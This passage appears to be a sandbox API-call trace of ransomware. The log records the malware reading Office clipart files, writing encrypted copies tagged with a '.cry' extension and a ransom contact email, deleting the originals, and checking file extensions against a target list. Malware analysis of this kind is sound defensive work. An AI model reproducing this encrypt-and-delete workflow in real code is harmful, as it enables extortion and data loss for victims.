lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x14c3, lpOverlapped=0x0) returned 1 [0051.308] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x14d0, lpOverlapped=0x0) returned 1 [0051.308] ReadFile (in: hFile=0x1f0, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.308] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.309] SetEndOfFile (hFile=0x1bc) returned 1 [0051.309] CloseHandle (hObject=0x1bc) returned 1 [0051.309] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.309] SetEndOfFile (hFile=0x1f0) returned 1 [0051.309] CloseHandle (hObject=0x1f0) returned 1 [0051.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.310] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0051.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0051.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0051.310] lstrlenW (lpString=".doc") returned 4 [0051.310] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.310] lstrlenW (lpString=".docx") returned 5 [0051.310] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.310] lstrlenW (lpString=".pdf") returned 4 [0051.310] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.310] lstrlenW (lpString=".xls") returned 4 [0051.310] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.310] lstrlenW (lpString=".xlsx") returned 5 [0051.310] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.310] lstrlenW (lpString=".ppt") returned 4 [0051.310] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0051.310] lstrlenW (lpString=".zip") returned 4 [0051.310] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.310] lstrlenW (lpString=".rar") returned 4 [0051.310] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.310] lstrlenW (lpString=".bz2") returned 4 [0051.310] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.310] lstrlenW (lpString=".7z") returned 3 [0051.310] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0051.311] lstrlenW (lpString=".dbf") returned 4 [0051.311] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0051.311] lstrlenW (lpString=".1cd") returned 4 [0051.311] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0051.311] lstrlenW (lpString=".jpg") returned 4 [0051.311] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.311] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=5030) returned 1 [0051.311] CloseHandle (hObject=0x1f0) returned 1 [0051.311] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 0x20 [0051.311] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.311] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.311] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.312] GetLastError () returned 0x0 [0051.313] ReadFile (in: hFile=0x1f0, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x13a6, lpOverlapped=0x0) returned 1 [0051.413] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x13b0, lpOverlapped=0x0) returned 1 [0051.414] ReadFile (in: hFile=0x1f0, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.414] WriteFile (in: hFile=0x1bc, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.414] SetEndOfFile (hFile=0x1bc) returned 1 [0051.427] CloseHandle (hObject=0x1bc) returned 1 [0051.427] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.427] SetEndOfFile (hFile=0x1f0) returned 1 [0051.428] CloseHandle (hObject=0x1f0) returned 1 [0051.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.428] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0051.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.429] lstrlenW (lpString=".doc") returned 4 [0051.429] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.429] lstrlenW (lpString=".docx") returned 5 [0051.429] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.429] lstrlenW (lpString=".pdf") returned 4 [0051.429] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.429] lstrlenW (lpString=".xls") returned 4 [0051.429] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.429] lstrlenW (lpString=".xlsx") returned 5 [0051.429] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.429] lstrlenW (lpString=".ppt") returned 4 [0051.429] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.429] lstrlenW (lpString=".zip") returned 4 [0051.429] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.429] lstrlenW (lpString=".rar") returned 4 [0051.429] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.429] lstrlenW (lpString=".bz2") returned 4 [0051.429] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.429] lstrlenW (lpString=".7z") returned 3 [0051.429] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.429] lstrlenW (lpString=".dbf") returned 4 [0051.429] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.429] lstrlenW (lpString=".1cd") returned 4 [0051.429] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.429] lstrlenW (lpString=".jpg") returned 4 [0051.429] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.457] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.457] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.459] GetLastError () returned 0x0 [0051.459] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2186, lpOverlapped=0x0) returned 1 [0051.481] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2190, lpOverlapped=0x0) returned 1 [0051.483] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.483] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.483] SetEndOfFile (hFile=0x22c) returned 1 [0051.483] CloseHandle (hObject=0x22c) returned 1 [0051.483] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.483] SetEndOfFile (hFile=0x194) returned 1 [0051.484] CloseHandle (hObject=0x194) returned 1 [0051.484] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0051.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0051.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0051.485] lstrlenW (lpString=".doc") returned 4 [0051.485] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.485] lstrlenW (lpString=".docx") returned 5 [0051.485] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.485] lstrlenW (lpString=".pdf") returned 4 [0051.485] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.485] lstrlenW (lpString=".xls") returned 4 [0051.485] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.485] lstrlenW (lpString=".xlsx") returned 5 [0051.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.485] lstrlenW (lpString=".ppt") returned 4 [0051.485] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0051.485] lstrlenW (lpString=".zip") returned 4 [0051.485] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.485] lstrlenW (lpString=".rar") returned 4 [0051.485] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.485] lstrlenW (lpString=".bz2") returned 4 [0051.485] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.485] lstrlenW (lpString=".7z") returned 3 [0051.485] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0051.485] lstrlenW (lpString=".dbf") returned 4 [0051.485] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0051.485] lstrlenW (lpString=".1cd") returned 4 [0051.486] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0051.486] lstrlenW (lpString=".jpg") returned 4 [0051.486] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.486] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=9248) returned 1 [0051.486] CloseHandle (hObject=0x194) returned 1 [0051.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 0x20 [0051.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.486] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.486] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.487] GetLastError () returned 0x0 [0051.487] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2420, lpOverlapped=0x0) returned 1 [0051.611] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2430, lpOverlapped=0x0) returned 1 [0051.612] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.612] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.612] SetEndOfFile (hFile=0x22c) returned 1 [0051.612] CloseHandle (hObject=0x22c) returned 1 [0051.612] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.612] SetEndOfFile (hFile=0x194) returned 1 [0051.613] CloseHandle (hObject=0x194) returned 1 [0051.613] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0051.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0051.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0051.614] lstrlenW (lpString=".doc") returned 4 [0051.614] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.614] lstrlenW (lpString=".docx") returned 5 [0051.614] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.614] lstrlenW (lpString=".pdf") returned 4 [0051.614] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.614] lstrlenW (lpString=".xls") returned 4 [0051.614] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.614] lstrlenW (lpString=".xlsx") returned 5 [0051.614] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.614] lstrlenW (lpString=".ppt") returned 4 [0051.614] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0051.614] lstrlenW (lpString=".zip") returned 4 [0051.614] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.614] lstrlenW (lpString=".rar") returned 4 [0051.614] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.614] lstrlenW (lpString=".bz2") returned 4 [0051.614] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.614] lstrlenW (lpString=".7z") returned 3 [0051.614] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0051.614] lstrlenW (lpString=".dbf") returned 4 [0051.614] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0051.614] lstrlenW (lpString=".1cd") returned 4 [0051.614] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0051.614] lstrlenW (lpString=".jpg") returned 4 [0051.615] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.615] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=3378) returned 1 [0051.615] CloseHandle (hObject=0x194) returned 1 [0051.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 0x20 [0051.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.619] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.619] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.619] GetLastError () returned 0x0 [0051.619] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xd32, lpOverlapped=0x0) returned 1 [0051.625] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xd40, lpOverlapped=0x0) returned 1 [0051.626] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.626] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.626] SetEndOfFile (hFile=0x22c) returned 1 [0051.626] CloseHandle (hObject=0x22c) returned 1 [0051.626] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.626] SetEndOfFile (hFile=0x194) returned 1 [0051.627] CloseHandle (hObject=0x194) returned 1 [0051.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.627] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0051.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.627] lstrlenW (lpString=".doc") returned 4 [0051.627] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.628] lstrlenW (lpString=".docx") returned 5 [0051.628] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.628] lstrlenW (lpString=".pdf") returned 4 [0051.628] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.628] lstrlenW (lpString=".xls") returned 4 [0051.628] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.628] lstrlenW (lpString=".xlsx") returned 5 [0051.628] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.628] lstrlenW (lpString=".ppt") returned 4 [0051.628] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.628] lstrlenW (lpString=".zip") returned 4 [0051.628] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.628] lstrlenW (lpString=".rar") returned 4 [0051.628] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.628] lstrlenW (lpString=".bz2") returned 4 [0051.628] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.628] lstrlenW (lpString=".7z") returned 3 [0051.628] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.628] lstrlenW (lpString=".dbf") returned 4 [0051.628] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.628] lstrlenW (lpString=".1cd") returned 4 [0051.628] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.628] lstrlenW (lpString=".jpg") returned 4 [0051.628] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.629] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=3026) returned 1 [0051.629] CloseHandle (hObject=0x194) returned 1 [0051.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program 